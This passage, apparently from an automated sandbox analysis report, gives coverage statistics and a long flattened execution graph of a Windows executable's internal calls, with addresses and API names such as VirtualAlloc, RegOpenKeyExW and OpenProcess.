                                                                                                                                                        • Instruction Fuzzy Hash: 06B17C70E002098FDB10EFA9D9857AEBBF2EF88314F24812DD415E7394EB769845CB91

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:7.4%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:8.6%
                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                        Total number of Limit Nodes:42
                                                                                                                                                        execution_graph 21364 406220 21365 406237 21364->21365 21366 406248 21364->21366 21381 406190 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 21365->21381 21367 406251 GetCurrentThreadId 21366->21367 21369 40625e 21366->21369 21367->21369 21377 405ec4 21369->21377 21371 406241 21371->21366 21372 4062a5 21373 4062d1 FreeLibrary 21372->21373 21375 4062d7 21372->21375 21373->21375 21374 406313 21375->21374 21376 406308 ExitProcess 21375->21376 21378 405f08 21377->21378 21379 405ed3 21377->21379 21378->21372 21379->21378 21382 414634 21379->21382 21381->21371 21383 41465c 21382->21383 21384 41463c 21382->21384 21383->21379 21385 41463f InterlockedCompareExchange 21384->21385 21385->21385 21386 41464d CloseHandle 21385->21386 21386->21383 21386->21385 21387 403220 21388 403230 21387->21388 21389 4032b8 21387->21389 21392 403274 21388->21392 21393 40323d 21388->21393 21390 4032c1 21389->21390 21391 402b58 21389->21391 21394 4032d9 21390->21394 21406 4033e8 21390->21406 21397 403533 21391->21397 21398 402b7a VirtualQuery 21391->21398 21399 402c5b 21391->21399 21395 402ca4 10 API calls 21392->21395 21396 403248 21393->21396 21400 402ca4 10 API calls 21393->21400 21402 4032fc 21394->21402 21407 4033c0 21394->21407 21430 4032e0 21394->21430 21418 40328b 21395->21418 21411 402c23 21398->21411 21412 402bb3 21398->21412 21405 402c59 21399->21405 21409 402ca4 10 API calls 21399->21409 21416 403255 21400->21416 21401 40344c 21403 402ca4 10 API calls 21401->21403 21423 403465 21401->21423 21415 40333c Sleep 21402->21415 21402->21430 21426 4034fc 21403->21426 21404 4032b1 21406->21401 21414 403424 Sleep 21406->21414 21406->21423 21413 402ca4 10 API calls 21407->21413 21428 402c72 21409->21428 21410 40326d 21439 402ca4 21411->21439 21412->21411 21421 402be0 VirtualAlloc 21412->21421 21422 402bde 21412->21422 21432 4033c9 21413->21432 21414->21401 21419 40343e Sleep 21414->21419 21420 403354 Sleep 21415->21420 21415->21430 21416->21410 21424 403028 10 API calls 21416->21424 21418->21404 21427 403028 10 API calls 21418->21427 21419->21406 21420->21402 21421->21411 21429 402bf6 VirtualAlloc 21421->21429 21422->21421 21424->21410 21425 4033e1 21426->21423 21433 403028 10 API calls 21426->21433 21427->21404 21428->21405 21434 403028 10 API calls 21428->21434 21429->21411 21431 402c0c 21429->21431 21431->21405 21432->21425 21436 403028 10 API calls 21432->21436 21437 403520 21433->21437 21434->21405 21435 402c2a 21435->21405 21463 403028 21435->21463 21436->21425 21440 402f04 21439->21440 21441 402cbc 21439->21441 21442 40301c 21440->21442 21443 402ec8 21440->21443 21449 402cce 21441->21449 21455 402d59 Sleep 21441->21455 21444 402a50 VirtualAlloc 21442->21444 21445 403025 21442->21445 21450 402ee2 Sleep 21443->21450 21452 402f22 21443->21452 21447 402a8b 21444->21447 21448 402a7b 21444->21448 21445->21435 21446 402cdd 21446->21435 21447->21435 21483 402a08 21448->21483 21449->21446 21456 402d9d Sleep 21449->21456 21458 402dbc 21449->21458 21450->21452 21454 402ef8 Sleep 21450->21454 21453 402f40 21452->21453 21457 402990 VirtualAlloc 21452->21457 21453->21435 21454->21443 21455->21449 21459 402d6f Sleep 21455->21459 21456->21458 21461 402db3 Sleep 21456->21461 21457->21453 21462 402dc8 21458->21462 21489 402990 21458->21489 21459->21441 21461->21449 21462->21435 21464 403120 21463->21464 21465 40303d 21463->21465 21466 402ab4 21464->21466 21467 403043 21464->21467 21465->21467 21470 4030ba Sleep 21465->21470 21468 40321a 21466->21468 21471 402a08 2 API calls 21466->21471 21469 40304c 21467->21469 21474 4030fe Sleep 21467->21474 21477 403135 21467->21477 21468->21405 21469->21405 21470->21467 21473 4030d4 Sleep 21470->21473 21472 402ac5 21471->21472 21475 402af5 21472->21475 21476 402adb VirtualFree 21472->21476 21473->21465 21474->21477 21478 403114 Sleep 21474->21478 21479 402aec 21475->21479 21480 402afe VirtualQuery VirtualFree 21475->21480 21476->21479 21481 4031b4 VirtualFree 21477->21481 21482 403158 21477->21482 21478->21467 21479->21405 21480->21475 21480->21479 21481->21405 21482->21405 21484 402a4e 21483->21484 21485 402a11 21483->21485 21484->21447 21485->21484 21486 402a1c Sleep 21485->21486 21487 402a31 21486->21487 21487->21484 21488 402a35 Sleep 21487->21488 21488->21485 21493 402924 21489->21493 21491 402998 VirtualAlloc 21492 4029af 21491->21492 21492->21462 21494 4028c4 21493->21494 21494->21491 21495 40f6c0 WriteFile 21496 40f6dd 21495->21496 21497 4046c0 21498 4046d0 WriteFile 21497->21498 21500 4046cc 21497->21500 21499 4046e8 GetLastError 21498->21499 21498->21500 21499->21500 21501 4083b0 21502 4083c0 GetModuleFileNameW 21501->21502 21504 4083dc 21501->21504 21505 40920c GetModuleFileNameW 21502->21505 21506 40925a 21505->21506 21511 40941c 21506->21511 21508 409286 21509 409298 LoadLibraryExW 21508->21509 21510 4092a0 21508->21510 21509->21510 21510->21504 21512 409455 21511->21512 21533 406bf0 21512->21533 21514 40947d 21515 40948f lstrcpynW lstrlenW 21514->21515 21516 4094b9 21515->21516 21518 40952a 21516->21518 21554 408f6c 21516->21554 21518->21508 21519 409515 21520 40951e 21519->21520 21521 40952f GetUserDefaultUILanguage 21519->21521 21522 409310 3 API calls 21520->21522 21578 408c28 EnterCriticalSection 21521->21578 21522->21518 21524 409540 21601 409310 21524->21601 21526 40954b 21527 409577 21526->21527 21528 40955b GetSystemDefaultUILanguage 21526->21528 21527->21518 21606 4093c0 GetUserDefaultUILanguage GetLocaleInfoW 21527->21606 21529 408c28 33 API calls 21528->21529 21531 40956c 21529->21531 21532 409310 3 API calls 21531->21532 21532->21527 21534 406bf4 21533->21534 21537 406c10 21533->21537 21534->21533 21536 406c00 21534->21536 21540 40716f 21534->21540 21541 4070b0 21534->21541 21535 406c40 21535->21514 21536->21537 21611 407504 21536->21611 21537->21535 21616 4041cc 14 API calls 21537->21616 21541->21540 21542 406bf0 15 API calls 21541->21542 21544 4070c3 21541->21544 21542->21544 21543 40710c 21543->21540 21547 407504 14 API calls 21543->21547 21546 4070ee 21544->21546 21617 406504 15 API calls 21544->21617 21546->21543 21618 406504 15 API calls 21546->21618 21550 407122 21547->21550 21549 40715a 21552 406bf0 15 API calls 21549->21552 21550->21549 21619 406368 14 API calls 21550->21619 21553 40716b 21552->21553 21553->21514 21555 408f83 21554->21555 21556 408f97 GetModuleFileNameW 21555->21556 21557 408fac 21555->21557 21558 408fc6 21556->21558 21559 408fb9 lstrcpynW 21557->21559 21560 408fd4 RegOpenKeyExW 21558->21560 21567 40913b 21558->21567 21559->21558 21561 409055 21560->21561 21562 408ff7 RegOpenKeyExW 21560->21562 21629 408d70 12 API calls 21561->21629 21562->21561 21563 409015 RegOpenKeyExW 21562->21563 21563->21561 21565 409033 RegOpenKeyExW 21563->21565 21565->21561 21565->21567 21566 409073 RegQueryValueExW 21568 409091 21566->21568 21569 4090c4 RegQueryValueExW 21566->21569 21567->21519 21572 4041b0 14 API calls 21568->21572 21570 4090e0 21569->21570 21571 4090c2 21569->21571 21573 4041b0 14 API calls 21570->21573 21575 40912a RegCloseKey 21571->21575 21630 4041cc 14 API calls 21571->21630 21574 409099 RegQueryValueExW 21572->21574 21576 4090e8 RegQueryValueExW 21573->21576 21574->21571 21575->21519 21576->21571 21579 408c74 LeaveCriticalSection 21578->21579 21580 408c54 21578->21580 21581 406bf0 15 API calls 21579->21581 21582 408c65 LeaveCriticalSection 21580->21582 21583 408c87 IsValidLocale 21581->21583 21592 408d17 21582->21592 21584 408ce5 EnterCriticalSection 21583->21584 21585 408c96 21583->21585 21671 406c7c 21584->21671 21587 408caa 21585->21587 21588 408c9f 21585->21588 21632 408908 18 API calls 21587->21632 21631 408b08 20 API calls 21588->21631 21592->21524 21593 408cb3 GetSystemDefaultUILanguage 21593->21584 21595 408cbd 21593->21595 21594 408ca8 21594->21584 21596 408cce GetSystemDefaultUILanguage 21595->21596 21633 406fe0 21595->21633 21670 408908 18 API calls 21596->21670 21599 408cdb 21600 406fe0 15 API calls 21599->21600 21600->21584 21602 409324 21601->21602 21603 409393 21602->21603 21604 409365 lstrcpynW 21602->21604 21603->21526 21700 4092d8 FindFirstFileW 21604->21700 21607 4092d8 2 API calls 21606->21607 21608 4093f3 21607->21608 21609 4092d8 2 API calls 21608->21609 21610 409410 21608->21610 21609->21610 21610->21518 21612 40753d 21611->21612 21613 407508 21611->21613 21612->21537 21613->21612 21620 4041b0 21613->21620 21615 407517 21615->21537 21616->21535 21617->21546 21618->21543 21619->21549 21622 4041b4 21620->21622 21621 4042c5 21628 404294 10 API calls 21621->21628 21622->21615 21622->21621 21623 4041be 21622->21623 21627 40a264 14 API calls 21622->21627 21623->21615 21626 4042e6 21626->21615 21627->21621 21628->21626 21629->21566 21630->21575 21631->21594 21632->21593 21634 406fe8 21633->21634 21644 407099 21633->21644 21635 406ff2 21634->21635 21647 406bf0 21634->21647 21637 407069 21635->21637 21638 406ffd 21635->21638 21636 406c10 21639 406c40 21636->21639 21673 4041cc 14 API calls 21636->21673 21645 407079 21637->21645 21693 406504 15 API calls 21637->21693 21649 407009 21638->21649 21674 406504 15 API calls 21638->21674 21639->21596 21640 406c00 21640->21636 21648 407504 14 API calls 21640->21648 21642 407029 21642->21644 21676 406f48 21642->21676 21644->21596 21645->21644 21646 406f48 15 API calls 21645->21646 21655 407045 21646->21655 21647->21636 21647->21640 21652 40716f 21647->21652 21653 4070b0 21647->21653 21648->21636 21649->21642 21675 406504 15 API calls 21649->21675 21653->21652 21657 406bf0 15 API calls 21653->21657 21660 4070c3 21653->21660 21656 407064 21655->21656 21689 406344 21655->21689 21656->21596 21657->21660 21658 40710c 21658->21652 21663 407504 14 API calls 21658->21663 21662 4070ee 21660->21662 21694 406504 15 API calls 21660->21694 21662->21658 21695 406504 15 API calls 21662->21695 21665 407122 21663->21665 21666 40715a 21665->21666 21696 406368 14 API calls 21665->21696 21668 406bf0 15 API calls 21666->21668 21669 40716b 21668->21669 21669->21596 21670->21599 21672 406c80 lstrcpynW LeaveCriticalSection 21671->21672 21672->21592 21673->21639 21674->21649 21675->21642 21677 406fb8 21676->21677 21678 406f55 21676->21678 21679 406344 14 API calls 21677->21679 21682 406f6d 21678->21682 21683 406fac 21678->21683 21697 406d1c 15 API calls 21678->21697 21688 406fa9 21679->21688 21680 407504 14 API calls 21680->21677 21682->21683 21684 406f86 21682->21684 21683->21680 21698 4041e4 14 API calls 21684->21698 21686 406f8e 21687 406344 14 API calls 21686->21687 21686->21688 21687->21688 21688->21655 21690 40634a 21689->21690 21692 406365 21689->21692 21690->21692 21699 4041cc 14 API calls 21690->21699 21692->21656 21693->21645 21694->21662 21695->21658 21696->21666 21697->21682 21698->21686 21699->21692 21701 409301 FindClose 21700->21701 21702 409307 21700->21702 21701->21702 21702->21602 21703 409d02 GetSystemInfo 21704 4069d4 21705 4068c4 21704->21705 21706 4069dc SysAllocStringLen 21704->21706 21709 4068d8 21705->21709 21710 4068ca SysFreeString 21705->21710 21707 406894 21706->21707 21708 4069ec SysFreeString 21706->21708 21711 4068b0 21707->21711 21712 4068a0 SysAllocStringLen 21707->21712 21710->21709 21712->21707 21712->21711 21713 40a178 21714 40a191 21713->21714 21715 40a1d2 21713->21715 21731 40493c 14 API calls 21714->21731 21717 40a19b 21732 40493c 14 API calls 21717->21732 21719 40a1a5 21733 40493c 14 API calls 21719->21733 21721 40a1af 21734 40874c DeleteCriticalSection 21721->21734 21723 40a1b4 21735 404144 21723->21735 21727 40a1be 21728 406344 14 API calls 21727->21728 21729 40a1c8 21728->21729 21730 406344 14 API calls 21729->21730 21730->21715 21731->21717 21732->21719 21733->21721 21734->21723 21736 40414d CloseHandle 21735->21736 21737 40415f 21735->21737 21736->21737 21738 40416d 21737->21738 21751 403b64 VirtualQuery Sleep Sleep VirtualAlloc MessageBoxA 21737->21751 21740 404176 VirtualFree 21738->21740 21741 40418f 21738->21741 21740->21741 21745 4040b4 21741->21745 21744 40a15f 6 API calls 21744->21727 21746 4040d9 21745->21746 21747 4040c7 VirtualFree 21746->21747 21748 4040dd 21746->21748 21747->21746 21749 404124 VirtualFree 21748->21749 21750 40413a 21748->21750 21749->21748 21750->21744 21751->21738 21752 44373c 21753 443744 21752->21753 21753->21753 22183 40a2b0 GetModuleHandleW 21753->22183 21761 44378b 21762 407450 15 API calls 21761->21762 21763 443797 21762->21763 21764 404cdc 14 API calls 21763->21764 21765 44379c 21764->21765 21766 4042f8 14 API calls 21765->21766 21767 4437a1 21766->21767 21768 407450 15 API calls 21767->21768 21769 4437ad 21768->21769 21770 404cdc 14 API calls 21769->21770 21771 4437b2 21770->21771 21772 4042f8 14 API calls 21771->21772 21773 4437b7 21772->21773 21774 407450 15 API calls 21773->21774 21775 4437c0 21774->21775 21776 404cdc 14 API calls 21775->21776 21777 4437c5 21776->21777 21778 4042f8 14 API calls 21777->21778 21779 4437ca 21778->21779 22209 404504 GetCommandLineW 21779->22209 21781 4437cf 21782 443876 21781->21782 22214 404564 21781->22214 21784 407450 15 API calls 21782->21784 21786 443882 21784->21786 21788 404cdc 14 API calls 21786->21788 21789 443887 21788->21789 21791 4042f8 14 API calls 21789->21791 21790 4437f0 21792 44396a 21790->21792 21795 404564 17 API calls 21790->21795 21794 44388c 21791->21794 21793 404564 17 API calls 21792->21793 21796 443977 21793->21796 21797 407450 15 API calls 21794->21797 21798 443803 21795->21798 21799 4072a4 15 API calls 21796->21799 21800 443898 21797->21800 21801 4072a4 15 API calls 21798->21801 21802 443984 21799->21802 21803 404cdc 14 API calls 21800->21803 21804 443810 21801->21804 21805 443986 21802->21805 21806 4439ac 21802->21806 21807 44389d 21803->21807 21804->21792 21810 404564 17 API calls 21804->21810 22938 43cea4 21805->22938 21814 4439bc 21806->21814 21815 4439ed 21806->21815 21809 4042f8 14 API calls 21807->21809 21812 4438a2 21809->21812 21813 443823 21810->21813 21811 443993 21817 407450 15 API calls 21811->21817 21818 407450 15 API calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 443a4b 21873->21877 21878 4438d7 21874->21878 21879 4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 21932->21939 21940 407450 15 API calls 21933->21940 21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 407450 15 API calls 21996->21997 22001 443ac3 21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 22057->22061 22062 443f92 22058->22062 22060 4042f8 14 API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 22120->22122 22123 404564 17 API calls 22120->22123 22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 404be8 14 API calls 22194->22197 22196 404be8 14 API calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 22269->22271 22270->22258 22277 407450 15 API calls 22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 